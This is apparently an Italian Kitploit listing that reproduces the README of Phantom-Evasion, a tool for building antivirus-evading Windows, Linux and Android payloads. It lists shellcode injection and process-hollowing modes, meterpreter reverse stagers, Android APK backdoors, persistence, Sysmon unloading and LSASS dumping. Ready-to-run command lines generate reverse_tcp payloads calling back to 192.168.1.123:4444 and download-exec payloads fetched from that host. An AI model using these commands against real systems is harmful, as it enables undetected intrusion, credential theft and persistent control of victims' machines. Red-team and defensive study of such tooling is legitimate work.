Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Phantom-Evasion — Strumento di evasione antivirus in Python | Kitploit
Strumenti/GitHubGitHub/oddcod3/phantom-evasion
Escalation di PrivilegiAnalisi Dinamica (Sandboxing)Framework di ExploitGenerazione di PayloadMeccanismi di PersistenzaShellcodePost-ExploitGenerazione di ShellcodeSviluppo PayloadArchived
GitHuboddcod3/phantom-evasion

Phantom-Evasion

1.4k3402 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Strumento di evasione antivirus in Python

Vedi Repository

PHANTOM EVASION 3.0

Phantom-Evasion è uno strumento di evasione antivirus scritto in Python (compatibile sia con Python che con Python3) in grado di generare eseguibili (quasi) completamente non rilevabili anche con i payload x86 più comuni di msfvenom.

I seguenti sistemi operativi supportano ufficialmente l'installazione automatica:

  1. Kali Linux
  2. Parrot Security

I seguenti sistemi operativi probabilmente supportano l'installazione automatica ma richiedono l'installazione manuale di metasploit-framework:

  1. OSX (testato su Catalina)
  2. Ubuntu
  3. Linux Mint
  4. Elementary
  5. Deepin
  6. altre distribuzioni Debian
  7. Centos
  8. Fedora
  9. Blackarch

I seguenti sistemi operativi richiedono l'installazione manuale:

  1. Windows 10

Basta clonare con git o scaricare e decomprimere la cartella Phantom-Evasion

Installazione:

Installazione automatica, apri un terminale ed esegui:

root@kitploit:~
python3 phantom-evasion.py --setup

oppure:

root@kitploit:~
chmod +x ./phantom-evasion.py

./phantom-evasion.py --setup

oppure avvia phantom-evasion in modalità interattiva e seleziona l'opzione 7

Dipendenze (solo per installazione manuale)

  1. metasploit-framework
  2. mingw-w64 (cygwin su windows)
  3. gcc-multilib
  4. apktool
  5. apksigner
  6. strip
  7. osslsigncode

RIGA DI COMANDO/INTERATTIVO:

  1. Avvia phantom-evasion in modalità interattiva:
root@kitploit:~
python3 phantom-evasion.py

oppure:

root@kitploit:~
./phantom-evasion.py
  1. Altrimenti, per vedere le opzioni della modalità da riga di comando:
root@kitploit:~
python3 phantom-evasion.py --help

oppure:

root@kitploit:~
./phantom-evasion.py --help

Moduli WINDOWS

-Ogni modulo C di payload Windows può essere compilato (supporta sia x86 che x64) come EXE o DLL/ReflectiveDLL.

-Iniezione di junkcode randomizzata (l'intensità, la frequenza e la probabilità di reiniezione possono essere impostate) e tecniche di evasione antivirus Windows (la frequenza può essere impostata).

-Crittografia shellcode/file Multibyte Xor/Vigenere supportata sia nei moduli Shellcode injection che Donwload Exec.

-Tecniche di Ntdll unhookapi e di mascheramento del processo PEB supportate.

-Ampia gamma di modalità di esecuzione supportate (sia locali che remote).

-Ampia gamma di modalità di allocazione della memoria del payload (Virtual_RWX, Virtual_RW/RX, Virtual_RW/RWX, Heap_RWX).

-È possibile impostare il caricamento dinamico delle API di Windows.

-Supporto per spoofing e firma dei certificati.

-Strip eseguibile (https://en.wikipedia.org/wiki/Strip_(Unix))

Iniezione di Shellcode in C per Windows

Payload Windows di msfvenom e shellcode personalizzati supportati. Lo shellcode può essere memorizzato come risorsa e recuperato in runtime tramite l'API FindResource.

Crittografia dello shellcode supportata:

root@kitploit:~
1. nessuna
2. Multibyte-Xor
3. Multibyte-Xor a chiave doppia
4. Vigenere
5. Vigenere a chiave doppia
  1. Il metodo di esecuzione locale può essere uno dei seguenti:

    Thread

    APC

    La modalità di allocazione della memoria locale può essere una delle seguenti:

    Virtual_RWX

    Virtual_RW/RX

    Virtual_RW/RWX

    Heap_RWX

  2. Il metodo di esecuzione remota può essere uno dei seguenti:

    ThreadExecutionHijack (abbreviato TEH)

    Processinject (abbreviato PI)

    APCSpray (abbreviato APCS)

    EarlyBird (abbreviato EB)

    EntryPointHijack (abbreviato EPH)

    La modalità di allocazione della memoria remota può essere una delle seguenti:

    Virtual_RWX

    Virtual_RW/RX

    Virtual_RW/RWX

Stager meterpreter in C puro per Windows (C)

Moduli stager meterpreter in C puro (TCP/HTTP/HTTPS) compatibili con msfconsole e Cobalt Strike Beacon. (reverse_tcp/reverse_http/reverse_https)

Usando la modalità da riga di comando:

root@kitploit:~
reverse_tcp c stager è WRT

reverse_http c stager è WRH

reverse_https c stager è WRS
  1. Il metodo di esecuzione locale può essere uno dei seguenti:

    Thread

    APC

    La modalità di allocazione della memoria locale può essere una delle seguenti:

    Virtual_RWX

    Virtual_RW/RX

    Virtual_RW/RWX

    Heap_RWX

Download-Exec in C per Windows senza scrittura su disco

Scarica exe/dll dall'URL fornito in memoria ed esegue/carica nel processo remoto (senza scrivere su disco).

Download crittografato EXE/DLL supportato:

root@kitploit:~
1. nessuna
                                 
2. Multibyte-Xor
                                 
3. Multibyte-Xor a chiave doppia
                               
4. Vigenere
                                
5. Vigenere a chiave doppia

La DLL/EXE crittografata verrà salvata come nomefileoriginale + "crypt" + ".dll" o ".exe"; questo è il file da scaricare.

  1. Windows DownloadExecExe senza scrittura su disco (WDE usando la modalità da riga di comando):

    Il metodo di esecuzione remota può essere uno dei seguenti:

    ProcessHollowing (abbreviato PH)

  2. Windows DownloadExecDll senza scrittura su disco (WDD usando la modalità da riga di comando):

    Il metodo di caricamento remoto può essere uno dei seguenti:

    ReflectiveDll (abbreviato RD)

    RDAPC (ReflectiveDllAPC)

    ManualMap (abbreviato MM) ---> solo x86

PAYLOAD LINUX

Modulo di iniezione di shellcode Linux (C)

Payload Linux di msfvenom e shellcode personalizzati supportati.

PAYLOAD ANDROID

  1. Backdoor offuscata Android con msfvenom:

    Offusca i payload di msfvenom e li ricostruisce (smali/baksmali) con apktool. Il payload offuscato può essere utilizzato per infettare file APK benigni.

Moduli di PERSISTENZA

  1. Persistenza Windows RegCreateKeyExW Aggiunta chiave di registro (C) L'eseguibile compilato deve essere caricato sulla macchina target ed eseguito specificando come argomento il percorso completo del file da aggiungere all'avvio.

  2. Persistenza Windows REG Aggiunta chiave di registro (CMD) Questo modulo genera payload di persistenza da riga di comando (Aggiunta chiave di registro tramite REG.exe).

  3. Persistenza Windows Mantieni processo attivo (C) L'eseguibile compilato deve essere caricato sulla macchina target ed eseguito. Utilizza CreateToolSnapshoot, ProcessFirst e ProcessNext per verificare se il processo specificato è attivo ogni X secondi (in caso contrario, crea un nuovo processo usando l'API WinExec)

  4. Persistenza Windows Schtasks (CMD)

    Questo modulo genera payload di persistenza da riga di comando (usando Schtasks.exe).

  5. Persistenza Windows Crea servizio (CMD)

    Questo modulo genera payload di persistenza da riga di comando (usando sc.exe).

Moduli di ESCALATION dei PRIVILEGI

  1. Windows DuplicateTokenEx (C)

    Crea un nuovo processo con un token clonato da un altro processo. L'eseguibile compilato deve essere caricato sulla macchina target ed eseguito.

Moduli di POSTESPLOITAZIONE

  1. Windows Scarica Sysmon (C) Scarica il driver sysmon, causando l'arresto della registrazione dei log degli eventi sysmon da parte del sistema. L'eseguibile compilato deve essere caricato sulla macchina target ed eseguito.

  2. Windows Scarica Sysmon (CMD) Scarica il driver sysmon, causando l'arresto della registrazione dei log degli eventi sysmon da parte del sistema.

  3. Windows Attrib nascondi file (CMD) Usa attrib per nascondere il file

  4. Windows SetFileAttribute nascosto (C) Nasconde il file usando l'API SetFileAttribute L'eseguibile compilato deve essere caricato sulla macchina target ed eseguito.

  5. Windows DumpLsass (C) Esegue il dump di Lsass usando l'API MiniWriteDumpWrite. L'eseguibile compilato deve essere caricato sulla macchina target ed eseguito.

  6. Windows DumpLsass (CMD)

    Esegue il dump di Lsass dalla riga di comando.

Esempi di modalità da riga di comando di Phantom-Evasion:

  1. Iniezione di shellcode Windows, output come exe firmato con certificato HTTPS falsificato, metodo di esecuzione locale: Thread, memoria: Virtual_RWX, crittografia: vigenere
root@kitploit:~
python3 phantom-evasion.py -m WSI -msfp windows/meterpreter/reverse_tcp -H 192.168.1.123 -P 4444 -i Thread -e 4 -mem Virtual_RWX -j 1 -J 15 -jr 0 -E 5 -c www.windows.com:443 -f exe -o filename.exe
  1. Iniezione di shellcode Windows x64, output come DLL riflessiva, metodo di esecuzione remota: ProcessInject (PI), memoria: Virtual_RW/RX, processo target: SkypeApp.exe, crittografia: xor a chiave doppia
root@kitploit:~
python3 phantom-evasion.py -m WSI -msfp windows/x64/meterpreter/reverse_tcp -a x64 -H 192.168.1.123 -P 4444 -tp SkypeApp.exe -i PI -e 3 -mem Virtual_RW/RX -j 1 -J 15 -jr 0 -E 5 -f dll -R -o filename.dll
  1. Iniezione di shellcode Windows x64, output come DLL stripata, shellcode memorizzato come risorsa, metodo di esecuzione remota: EarlyBird (EB), memoria: Virtual_RW/RX, processo target: svchost.exe, crittografia: xor
root@kitploit:~
python3 phantom-evasion.py -m WSI -msfp windows/x64/meterpreter/reverse_tcp -a x64 -H 192.168.1.123 -P 4444 -tp svchost.exe -i EB -e 2 -mem Virtual_RW/RX -j 1 -J 15 -jr 0 -E 5 -f dll -res -S -o filename.dll
  1. Stager reverse HTTPS Windows x64, output come DLL stripata, metodo di esecuzione locale: Thread, memoria: Heap_RWX
root@kitploit:~
python3 phantom-evasion.py -m WRS -a x64 -H 192.168.1.123 -P 4444 -i Thread -mem Heap_RWX -j 1 -J 15 -jr 0 -E 5 -f dll -S -o filename.dll
  1. DownloadExec DLL Windows x86, output come EXE stripato, metodo di esecuzione remota: ManualMap (MM), processo target: OneDrive.exe, dimensione download: 1000000 byte
root@kitploit:~
python3 phantom-evasion.py -m WDD -U http://192.168.1.123/payload.dll -i MM -tp OneDrive.exe -ds 1000000  -j 10 -J 10 -jr 0 -E 10 -f exe -S -o filename.exe

  1. DownloadExec EXE Windows x64, output come DLL riflessiva stripata, metodo di esecuzione remota: ProcessHollowing (PH), processo target: svchost.exe, dimensione download: 1000000 byte
root@kitploit:~
python3 phantom-evasion.py -m WDE -U http://192.168.1.123/payloadcrypt.exe -e 4 -ef payload.exe -i PH -tp svchost.exe -ds 1000000  -j 1 -J 5 -jr 0 -E 3 -f dll -R -S -o filename.dll

Licenza

GPLv3.0

Crediti e risorse utili

https://github.com/stephenfewer/ReflectiveDLLInjection

https://github.com/rsmudge/metasploit-loader

https://ired.team

https://github.com/theevilbit/injection

http://www.rohitab.com/discuss/topic/40761-manual-dll-injection/

https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

https://wikileaks.org/ciav7p1/cms/files/BypassAVDynamics.pdf

Scarica lo strumento